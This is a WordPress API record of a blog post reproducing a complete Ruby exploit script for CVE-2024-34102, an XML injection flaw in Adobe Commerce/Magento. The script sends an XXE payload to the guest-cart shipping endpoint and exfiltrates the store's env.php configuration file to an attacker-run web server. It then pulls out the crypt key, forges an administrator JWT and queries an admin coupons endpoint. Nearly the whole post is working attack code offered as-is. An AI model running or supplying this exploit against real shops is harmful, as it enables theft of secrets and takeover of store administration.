{"id":58371,"date":"2024-07-22T16:29:49","date_gmt":"2024-07-22T13:29:49","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/179640\/CVE-2024-34102.rb.txt"},"modified":"2024-07-22T16:29:49","modified_gmt":"2024-07-22T13:29:49","slug":"adobe-commerce-magento-open-source-xml-injection-user-impersonation","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/adobe-commerce-magento-open-source-xml-injection-user-impersonation\/","title":{"rendered":"Adobe Commerce \/ Magento Open Source XML Injection \/ User Impersonation"},"content":{"rendered":"

#!\/usr\/bin\/env ruby -W0<\/p>\n

require ‘bundler’
Bundler.require(:default)<\/p>\n

DEBUG = false
USE_PROXY = false
PROXY_ADDR = ‘127.0.0.1’
PROXY_PORT = 8080<\/p>\n

def debug(msg)
puts msg.inspect if DEBUG
end<\/p>\n

def rand_text(length = 8)
# random string generator
o = [(‘a’..’z’), (‘A’..’Z’)].map(&:to_a).flatten
(0…length).map { o[rand(o.length)] }.join
end<\/p>\n

def dtd_param_name
@dtd_param_name ||= rand_text()
end<\/p>\n

def ent_eval
@ent_eval ||= rand_text()
end<\/p>\n

def leak_param_name
@leak_param_name ||= rand_text()
end<\/p>\n

def remote_addr
@remote_addr ||= “http:\/\/#{@srv_host.host}:#{@srv_host.port}”
end<\/p>\n

def http
@http ||= begin
http = if USE_PROXY
Net::HTTP.new(@target_uri.host, @target_uri.port, PROXY_ADDR, PROXY_PORT)
else
Net::HTTP.new(@target_uri.host, @target_uri.port)
end<\/p>\n

if @target_uri.port == 443 || @target_uri.to_s.match(%r{http(s).*})
http.use_ssl = true
http.verify_mode = OpenSSL::SSL::VERIFY_NONE
end<\/p>\n

http.set_debug_output($stderr) if DEBUG
http
end
end<\/p>\n

def make_xxe_dtd
filter_path = ‘php:\/\/filter\/convert.base64-encode\/resource=..\/app\/etc\/env.php’
ent_file = rand_text()
%(
<!ENTITY % #{ent_file} SYSTEM “#{filter_path}”>
<!ENTITY % #{dtd_param_name} “<!ENTITY #{ent_eval} SYSTEM ‘#{remote_addr}\/?#{leak_param_name}=%#{ent_file};’>”>
)
end<\/p>\n

def xxe_xml_data()
param_entity_name = rand_text()<\/p>\n

xml = “<?xml version=’1.0′ ?>”
xml += “<!DOCTYPE #{rand_text()}”
xml += ‘[‘
xml += ” <!ELEMENT #{rand_text()} ANY >”
xml += ” <!ENTITY % #{param_entity_name} SYSTEM ‘#{remote_addr}\/#{rand_text}.dtd’> %#{param_entity_name}; %#{dtd_param_name}; “
xml += ‘]’
xml += “> <r>&#{ent_eval};<\/r>”<\/p>\n

xml
end<\/p>\n

LIBXML_NOENT = 2
LIBXML_PARSEHUGE = 524288<\/p>\n

def xxe_request()
debug(‘Sending XXE request’)<\/p>\n

signature = rand_text().capitalize<\/p>\n

post_data = {
“address”: {
“#{signature}”: rand_text(),
“totalsCollector”: {
“collectorList”: {
“totalCollector”: {
“\\u0073\\u006F\\u0075\\u0072\\u0063\\u0065\\u0044\\u0061\\u0074\\u0061”: {
“data”: xxe_xml_data(),
“options”: LIBXML_NOENT|LIBXML_PARSEHUGE
}
}
}
}
}
}.to_json
req = Net::HTTP::Post.new(‘\/rest\/V1\/guest-carts\/1\/estimate-shipping-methods’)
req.body = post_data
req.content_type = ‘application\/json’
# req.user_agent = ‘Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_15_7)’
res = http.request(req)<\/p>\n

raise RuntimeError, “Server returned unexpected response” unless res&.code == ‘400’<\/p>\n

body = JSON.parse(res.body)<\/p>\n

raise RuntimeError, “Server returned unexpected response” unless body[‘parameters’][‘fieldName’] == signature<\/p>\n

end<\/p>\n

TARGET_USER_ID = 1<\/p>\n

USER_TYPE_INTEGRATION = 1;
USER_TYPE_ADMIN = 2;
USER_TYPE_CUSTOMER = 3;
USER_TYPE_GUEST = 4;<\/p>\n

def jwt_encode(key, algorithm = ‘HS256’)
def pad_key(key, total_length, pad_char)
left_padding = (total_length – key.length) \/ 2
right_padding = total_length – key.length – left_padding
pad_char * left_padding + key + pad_char * right_padding
end
header = {
kid: “1”,
alg: “HS256”
}<\/p>\n

payload = {
uid: TARGET_USER_ID,
utypid: USER_TYPE_ADMIN,
iat: Time.now.to_i, # Token issue time’,
exp: Time.now.to_i + 10 * 24 * 60 * 60, # Token expiration time
}<\/p>\n

def base64_url_encode(str)
Base64.urlsafe_encode64(str).tr(‘=’, ”)
end<\/p>\n

padded_key = pad_key(key, 2048, ‘&’)<\/p>\n

encoded_header = base64_url_encode(header.to_json)
encoded_payload = base64_url_encode(payload.to_json)<\/p>\n

# Create the signature
data = “#{encoded_header}.#{encoded_payload}”
signature = OpenSSL::HMAC.digest(OpenSSL::Digest.new(‘sha256’), padded_key, data)
encoded_signature = base64_url_encode(signature)<\/p>\n

# Combine the header, payload, and signature to form the JWT
“#{encoded_header}.#{encoded_payload}.#{encoded_signature}”<\/p>\n

end<\/p>\n

def exploit()
begin
puts “Starting web server…”
body = make_xxe_dtd()
file_content = nil
file_content_reader, file_content_writer = IO.pipe
WEBrick::HTTPRequest.const_set(“MAX_URI_LENGTH”, 10240)
wbserver_options = {
:BindAddress => ‘0.0.0.0’,
:Port => @srv_host.port,
:Logger => WEBrick::Log.new($stderr, WEBrick::Log::DEBUG),
:AccessLog => [],
# :RequestTimeout => 300, # Increase request timeout
# :RequestMaxUriLength => 100240 # Increase max URI length
}
wbserver_options[:Logger] = WEBrick::Log.new(“\/dev\/null”) unless DEBUG<\/p>\n

pid = Process.fork do
file_content_reader.close<\/p>\n

server = WEBrick::HTTPServer.new(wbserver_options)
server.mount_proc ‘\/’ do |req, res|
if req.path =~ \/\\.dtd$\/
res.body = body
elsif req.query_string.match(\/#{leak_param_name}=(.*)\/)
file_content = Base64.decode64(Regexp.last_match(1))
# puts “Received leaked file content:\\n#{file_content}”
file_content_writer.puts file_content<\/p>\n

else
res.body = ‘OK’
end
end<\/p>\n

trap(“INT”) do
server.shutdown
file_content_writer.close
end<\/p>\n

server.start
end<\/p>\n

sleep(1)
xxe_request()
file_content_writer.close<\/p>\n

begin
# Set a timeout for reading from the pipe
Timeout.timeout(5) do # 5 seconds timeout, adjust as necessary
file_content = file_content_reader.read_nonblock(10000) # Adjust the size as necessary
end
rescue Timeout::Error
puts “Reading from pipe timed out.”
rescue EOFError
puts “End of file reached.”
ensure
file_content_reader.close
end<\/p>\n

# Use file_content as needed here
if file_content
# puts “Successfully read file content:\\n#{file_content}”
key = file_content.match(\/’key’ => ‘(.*)’\/)[1]if key
debug “Found key: #{key}”
jwt = jwt_encode(key)
puts “Generated JWT: #{jwt}”
puts(“Sending request with JWT to coupons endpoint”)
# Perform authenticated request to a admin endpoint
res = http.request(Net::HTTP::Get.new(‘\/rest\/default\/V1\/coupons\/search?searchCriteria=’, {‘Authorization’ => “Bearer #{jwt}”}))
raise RuntimeError, “Server returned unexpected response” unless res&.code == ‘200’
puts “Available coupons:”
puts JSON.pretty_generate(JSON.parse(res.body))
else
puts “Failed to extract key from file content.”
end
else
puts “Failed to read file content or content is empty.”
end<\/p>\n

puts “Exploit completed”<\/p>\n

rescue RuntimeError => e
puts “#{e.class} – #{e.message}”
ensure
if pid
Process.kill(“INT”, pid)
Process.wait(pid)
end
end
end<\/p>\n

if __FILE__ == $0
@target_uri = URI.parse(ARGV[0])
@srv_host = URI.parse(ARGV[1])<\/p>\n

exploit()
end<\/p>\n","protected":false},"excerpt":{"rendered":"

#!\/usr\/bin\/env ruby -W0 require ‘bundler’Bundler.require(:default) DEBUG = falseUSE_PROXY = falsePROXY_ADDR = ‘127.0.0.1’PROXY_PORT = 8080 def debug(msg)puts msg.inspect if DEBUGend def rand_text(length = 8)# random string generatoro = [(‘a’..’z’), (‘A’..’Z’)].map(&:to_a).flatten(0…length).map { o[rand(o.length)] }.joinend def dtd_param_name@dtd_param_name ||= rand_text()end def ent_eval@ent_eval ||= rand_text()end def leak_param_name@leak_param_name ||= rand_text()end def remote_addr@remote_addr ||= “http:\/\/#{@srv_host.host}:#{@srv_host.port}”end def http@http ||= beginhttp = if USE_PROXYNet::HTTP.new(@target_uri.host, …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-58371","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/58371","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=58371"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/58371\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=58371"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=58371"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=58371"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}